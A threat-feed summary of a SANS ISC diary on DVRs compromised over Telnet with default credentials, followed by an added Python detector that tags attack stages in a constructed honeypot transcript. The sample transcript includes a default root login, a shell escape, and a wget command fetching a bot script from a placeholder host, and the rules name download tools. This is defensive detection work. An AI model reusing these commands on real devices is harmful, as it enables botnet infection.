[Guest Diary] Compromised DVRs and Finding Them in the Wild, (Thu, Apr 16th)
ID: 08609cd1-e031-503f-9f62-71df4810b321
STIX ID: report--08609cd1-e031-503f-9f62-71df4810b321
Feed Name: SANS ISC Diary
This write-up documents a rapid (roughly 2-second) Telnet compromise of an Internet-exposed Airspace/Dahua DVR using default credentials. The attacker broke out of the vendor CLI into a Unix shell, staged a hidden file in /dev/shm, checked whether tftp or wget was available, and prepared to download malware. The author correlates the incident with Shodan and AbuseIPDB data, arrives at a conservative estimate of about 202 compromised devices sharing the identified footprint, maps the observed actions to MITRE ATT&CK techniques, and closes with practical mitigations: restrict Telnet exposure, change default credentials, and disallow remote root logins.
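The attack chain summarised above (default login, CLI escape, /dev/shm staging, tftp/wget probe, download attempt) is a compact sequence that a honeypot or Telnet proxy log can be screened for. The following is an added example, not code from the diary or from SANS ISC: it parses a constructed, timestamped Telnet transcript, tags each stage, maps the stages to ATT&CK technique IDs chosen for this example (the diary's own mapping is not reproduced here), and measures how fast the session moved from login to download, since a sub-5-second chain indicates scripted rather than hands-on activity. The credential list, the transcript, the 203.0.113.5 address and the 5-second threshold are all assumptions.

```python
import re
from datetime import datetime

# Constructed sample transcript (added example; not the diary's capture).
# Format: ISO timestamp, then "S:" for DVR output or "C:" for attacker input.
SAMPLE_TRANSCRIPT = """\
2024-04-16T10:00:00.100 S: login:
2024-04-16T10:00:00.200 C: root
2024-04-16T10:00:00.300 S: Password:
2024-04-16T10:00:00.400 C: default
2024-04-16T10:00:00.600 S: DVR>
2024-04-16T10:00:00.800 C: shell
2024-04-16T10:00:01.000 S: BusyBox built-in shell (ash)
2024-04-16T10:00:01.200 C: cd /dev/shm
2024-04-16T10:00:01.400 C: echo -n > .t && rm -f .t
2024-04-16T10:00:01.800 C: which tftp; which wget
2024-04-16T10:00:02.100 C: wget http://203.0.113.5/bot.sh -O .x
"""

# Placeholder default credentials (assumption): a real deployment would load the
# vendor's factory defaults here instead of these two pairs.
DEFAULT_CREDS = {("root", "default"), ("admin", "admin")}

# (stage name, regex over attacker input, ATT&CK technique or None).
# The technique mapping is this example's own choice, not the diary's table.
RULES = [
    ("cli_escape",    re.compile(r"^(shell|sh|/bin/sh|busybox\s+sh)\b"),      "T1059.004"),
    ("tmpfs_staging", re.compile(r"/dev/shm"),                                None),
    ("hidden_file",   re.compile(r"(>|-O)\s*\.[\w-]+"),                       "T1564.001"),
    ("tool_probe",    re.compile(r"\b(which|command -v)\s+(tftp|wget)"),       "T1105"),
    ("tool_transfer", re.compile(r"\b(wget|tftp|curl)\b\s+\S*(://|-g|-r)"),   "T1105"),
]

LINE_RE = re.compile(r"^(\S+) ([SC]): ?(.*)$")


def parse(transcript):
    """Return [(timestamp, side, text)] for every well-formed transcript line."""
    events = []
    for raw in transcript.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # tolerate noise lines such as banners without a prefix
        events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3).strip()))
    return events


def analyze(transcript, default_creds=DEFAULT_CREDS, fast_threshold=5.0):
    """Tag attack stages, collect technique IDs and time the chain."""
    stages, techniques = [], set()
    expect = user = None          # login-prompt state machine
    first_ts = last_ts = None     # first and last attacker input
    for ts, side, text in parse(transcript):
        if side == "S":
            if re.search(r"login:\s*$", text, re.I):
                expect = "user"
            elif re.search(r"password:\s*$", text, re.I):
                expect = "pass"
            continue
        first_ts = first_ts or ts
        last_ts = ts
        if expect == "user":
            user, expect = text, None
            continue
        if expect == "pass":
            expect = None
            if (user, text) in default_creds:
                stages.append("default_login")
                techniques.add("T1078.001")   # Valid Accounts: Default Accounts
            continue
        for name, rx, tid in RULES:
            if rx.search(text):
                if name not in stages:
                    stages.append(name)
                if tid:
                    techniques.add(tid)
    elapsed = (last_ts - first_ts).total_seconds() if first_ts else 0.0
    return {
        "stages": stages,
        "techniques": sorted(techniques),
        "elapsed_seconds": round(elapsed, 3),
        # A full chain in under fast_threshold seconds is scripted, not interactive.
        "automated": first_ts is not None and elapsed < fast_threshold,
        "compromised": "default_login" in stages
        and ("tool_transfer" in stages or "hidden_file" in stages),
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_TRANSCRIPT))
```

The rules deliberately key on the attacker's input rather than the device's output, because the vendor CLI banner and prompt vary between firmware builds while the shell-escape keywords, /dev/shm path and tool probes do not. On a real honeypot feed the interesting output is the pair of `compromised` and `automated` flags together with `elapsed_seconds`: the same chain completing in under a few seconds across many source addresses is the signature of the mass scanning the diary's ~202-device estimate is built on.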
